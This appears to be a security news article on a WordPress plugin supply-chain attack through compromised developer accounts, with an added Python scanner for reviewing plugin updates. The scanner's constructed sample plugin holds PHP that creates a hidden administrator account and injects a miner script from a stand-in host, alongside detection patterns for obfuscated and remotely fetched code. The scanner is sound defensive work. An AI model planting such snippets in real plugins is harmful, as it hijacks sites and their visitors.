Wordfence's Threat Intelligence team identified a significant attack on the WordPress supply chain, affecting several popular plugins installed on live websites.
According to Wordfence, the Social Warfare plugin was compromised with malware through the WordPress repository, resulting in the insertion of malicious administrator accounts, SEO spam, and even cryptocurrency miners into website footers.
Approximately 35,000 websites may have been affected by this attack, although it is unclear how many of them actually updated to a vulnerable version.
How did the attack occur?
The incident was the result of reused credentials on WordPress.org developer accounts, as noted in the official WordPress.org statement. Five developer accounts with commit access were compromised due to the use of passwords found in external data breaches.
This practice allowed attackers to take over the accounts and insert malicious code into the affected plugins without immediate detection.
Analysis of affected plugins
Affected plugins (used for website creation or optimization) include:
Social Warfare;
Blaze Widget;
Wrapper Link Element;
Contact Form 7 Multi-Step Addon;
Simply Show Hooks.
Each of these plugins had specific vulnerable versions, which were later fixed by removing the malicious code and adding measures to invalidate administrator passwords.
Security team investigation and conclusions
During the investigation, it was observed that the malicious compromises showed no clear correlation between plugin authors, suggesting that the attackers exploited individual compromised accounts rather than compromising the WordPress.org infrastructure.
The lack of sophistication in the malicious code and the use of detailed comments also indicate possible automation or use of AI tools in creating the malware.
Preventive measures for developers and companies
To prevent future supply chain attacks like this, it is critical that developers and organizations adopt robust security practices:
Email Release Confirmation: use the release confirmation functionality available on WordPress.org to validate all plugin and theme releases;
Strong passwords and two-factor authentication: implement strong, unique passwords for all accounts with commit access, and enable two-factor authentication for an additional layer of security;
Independent monitoring and review: keep a constant watch on plugin and theme updates, checking each new commit for suspicious activity.
Recommendations for WordPress Website Owners
For WordPress website owners, it is recommended to:
Manual plugin and theme updates: disable automatic updates and review the code of each plugin and theme before applying updates manually;
Avoid abandoned plugins: avoid using unmaintained plugins, as they pose a greater risk due to lack of security updates;
Regular malware scanning: implement regular malware scans to detect any malicious activity on your website.
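As an added illustration of the "independent monitoring and review" and "regular malware scanning" measures above (this is example code written for this page, not a tool from Wordfence or WordPress.org), the Python script below scans PHP plugin source for the kinds of additions described in this report: creation of administrator accounts, scripts injected into the site footer, and obfuscated or remotely fetched code. The two plugin sources are constructed samples, the indicator patterns are heuristic assumptions rather than signatures of the real malware, and the diff-based review flags only the lines a new release adds, which is the view a reviewer wants when checking a single commit or update.

```python
import difflib
import re

# Constructed sample plugin sources (not the real affected plugins).
CLEAN_PLUGIN = """<?php
/* Plugin Name: Example Widget */
add_action('init', 'example_widget_register');
function example_widget_register() { register_widget('Example_Widget'); }
"""

# Same plugin with the kinds of additions this report describes appended:
# a hidden administrator account and a script injected into the footer.
SUSPICIOUS_PLUGIN = CLEAN_PLUGIN + """// creates a hidden account with full privileges
add_action('init', function () {
    $u = wp_insert_user(array('user_login' => 'wp_support', 'user_pass' => 'x', 'role' => 'administrator'));
});
add_action('wp_footer', function () {
    echo '<script src="https://example.invalid/miner.js"></script>';
});
"""

# Heuristic indicators (assumptions for this example). Each is a bounded
# regex so one pattern cannot span an entire file and produce false matches.
INDICATORS = [
    ("admin account creation",
     re.compile(r"wp_(insert|create)_user\s*\(.{0,300}?['\"]administrator['\"]", re.S)),
    ("footer script injection",
     re.compile(r"add_action\(\s*['\"]wp_footer['\"][\s\S]{0,500}?<script")),
    ("obfuscated execution",
     re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(")),
    ("remote code fetch",
     re.compile(r"(file_get_contents|curl_exec)\s*\(.{0,200}?https?://", re.S)),
]


def added_lines(old_source: str, new_source: str) -> list[str]:
    """Lines present in the new release but not in the old one (the commit-review view)."""
    diff = difflib.unified_diff(
        old_source.splitlines(), new_source.splitlines(), lineterm="", n=0
    )
    return [line[1:] for line in diff
            if line.startswith("+") and not line.startswith("+++")]


def scan_source(source: str) -> list[str]:
    """Return the names of all indicators found in a PHP source string (malware-scan view)."""
    return [name for name, pattern in INDICATORS if pattern.search(source)]


def review_release(old_source: str, new_source: str) -> list[str]:
    """Scan only the code a new release adds, so a reviewer sees what changed, not the whole plugin."""
    return scan_source("\n".join(added_lines(old_source, new_source)))


if __name__ == "__main__":
    print("full scan of suspicious release:", scan_source(SUSPICIOUS_PLUGIN))
    print("review of clean -> suspicious:", review_release(CLEAN_PLUGIN, SUSPICIOUS_PLUGIN))
    print("review of unchanged release:", review_release(SUSPICIOUS_PLUGIN, SUSPICIOUS_PLUGIN))
```

In practice the two inputs would be the currently installed plugin files and the files from the pending update; a non-empty result from review_release is a reason to hold the update and read the flagged lines by hand, since pattern matching of this kind trades precision for speed and will miss code that is split across files or obfuscated differently.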